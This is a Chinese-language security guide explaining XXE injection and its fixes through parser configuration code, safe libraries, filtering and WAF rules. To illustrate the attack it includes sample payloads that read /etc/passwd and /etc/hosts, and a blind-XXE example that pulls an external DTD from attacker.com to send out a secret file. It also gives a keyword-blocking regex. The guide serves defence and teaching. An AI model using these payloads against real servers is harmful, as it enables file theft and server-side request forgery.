XML外部实体注入(XXE)是一种严重的安全漏洞,攻击者利用XML解析器处理外部实体的功能来读取服务器内部文件、执行远程请求(SSRF)、扫描内网端口或发起拒绝服务攻击。以下是详细解释和修复方案:
XXE 攻击原理
外部实体声明
XML允许定义实体(变量),实体可引用外部资源:xml
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
实体注入
攻击者将恶意实体注入XML输入:xml
<data>&xxe;</data>
解析器会将
&xxe;替换为/etc/passwd文件内容。攻击类型
读取本地文件(
file://)发起HTTP请求(
http://)→ SSRF拒绝服务(Billion Laughs 攻击)
端口扫描(结合SSRF)
修复方案
1. 禁用外部实体处理(根本方案)
Java (SAX/DOM)
java
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
.NET (XmlReader)
csharp
var settings = new XmlReaderSettings {
DtdProcessing = DtdProcessing.Prohibit,
XmlResolver = null // 禁用解析器
};
Python (lxml)
python
from lxml import etree parser = etree.XMLParser(resolve_entities=False, no_network=True)
2. 使用安全的XML库
优先选择默认禁用外部实体的库:
Java:
OWASP Java Encoder、jackson-dataformat-xmlPython:
defusedxml(替代标准库)python
from defusedxml.ElementTree import parse parse(xml_file)
3. 输入验证与过滤
过滤用户输入的
<!DOCTYPE>和<!ENTITY>声明使用正则表达式拦截敏感关键字(临时缓解):
regex
<!ENTITY.*?SYSTEM|file:|http:
4. 输出编码
避免直接输出XML解析结果,使用HTML编码:
java
String safeOutput = Encode.forHtmlContent(rawXMLOutput);
5. 服务器层防御
WAF规则:拦截包含
ENTITY、SYSTEM等关键词的请求文件权限:限制应用账户对系统文件的访问权限
XXE 检测方法
手动测试
提交测试Payload:xml
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hosts"> ]> <data>&xxe;</data>
自动化工具
OWASP ZAP、Burp Suite Professional(主动扫描)
XXEinjector(自动化利用工具)
额外注意事项
依赖库风险:即使代码安全,底层库(如Log4j 1.x)可能引入XXE
非文件协议攻击:防范
php://filter、gopher://等协议盲XXE:通过DNS查询或HTTP请求外带数据(需配置外部DTD)
xml
<!ENTITY % payload SYSTEM "file:///secret"> <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"> %dtd;
修复后验证
使用单元测试覆盖XXE攻击场景
定期进行安全扫描(SAST/DAST)
渗透测试:尝试读取
/etc/passwd或触发DNS查询
关键原则:始终禁用DTD和外部实体解析。大多数现代XML解析器提供了明确的开关选项,启用安全配置是防御XXE的核心。